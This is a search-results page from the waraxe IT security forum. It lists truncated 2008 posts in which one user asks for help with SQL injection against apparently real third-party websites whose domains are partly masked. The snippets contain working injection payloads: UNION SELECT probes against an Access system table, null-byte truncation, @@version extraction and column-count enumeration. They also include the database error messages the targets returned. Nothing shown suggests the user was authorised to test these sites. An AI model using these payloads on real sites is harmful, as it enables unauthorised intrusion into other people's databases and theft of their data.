Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 82
Members: 0
Total: 82
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index
Search found 7 matches
missing operator???
PostForum:Sql injection Posted: Thu May 15, 2008 5:06 pm Subject: missing operator???
mux0x55
Replies: 9
Views: 12356





noticias.asp?id=-1 UNION SELECT 1 FROM msysaccessobjects%00


http://www.*****.org.br/le*****noticias.asp?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 FROM msysaccessobjects%00

column affected is ...
missing operator???
PostForum:Sql injection Posted: Thu May 15, 2008 1:53 pm Subject: missing operator???
mux0x55
Replies: 9
Views: 12356





noticias.asp?id=-1 UNION SELECT 1%00
[/quote]

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table ...
missing operator???
PostForum:Sql injection Posted: Thu May 15, 2008 1:29 pm Subject: missing operator???
mux0x55
Replies: 9
Views: 12356





noticias.asp?id=-1%00


ADODB.Field error '80020009'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/ler****noticias.asp, ...
missing operator???
PostForum:Sql injection Posted: Thu May 15, 2008 1:13 pm Subject: missing operator???
mux0x55
Replies: 9
Views: 12356





noticias.asp?id=1316+AND+1=1


gives the same error without other info...


noticias.asp?id=1316%00


no errors and returns a valid page


noticias.asp?id=1315%2b1


ADODB.Field error ...
missing operator???
PostForum:Sql injection Posted: Thu May 15, 2008 10:29 am Subject: missing operator???
mux0x55
Replies: 9
Views: 12356




Hi again guys..
When I try this:

http://www.*****.org.br/le***noticias.asp?id=1316 or 1=convert(int, @@version)

I obtain this:

Microsoft OLE DB Provider for ODBC Drivers error '8 ...
union all select @@version etc... returns a valid page
PostForum:Sql injection Posted: Fri May 09, 2008 9:10 am Subject: union all select @@version etc... returns a valid page
mux0x55
Replies: 4
Views: 7930




Thank you for ur answers guys...
Then... I told that those are right columns 'cause when I try a column number less then 20 I got the error msg '... sql statements must have equal number etc...'
Am ...
union all select @@version etc... returns a valid page
PostForum:Sql injection Posted: Thu May 08, 2008 3:56 pm Subject: union all select @@version etc... returns a valid page
mux0x55
Replies: 4
Views: 7930




Hi @ all.
When I try this:

http://www.***********.com/book.php?id=25 union all select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --

column number is correct but it returns a ...
Page 1 of 1
All times are GMT


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.084 Seconds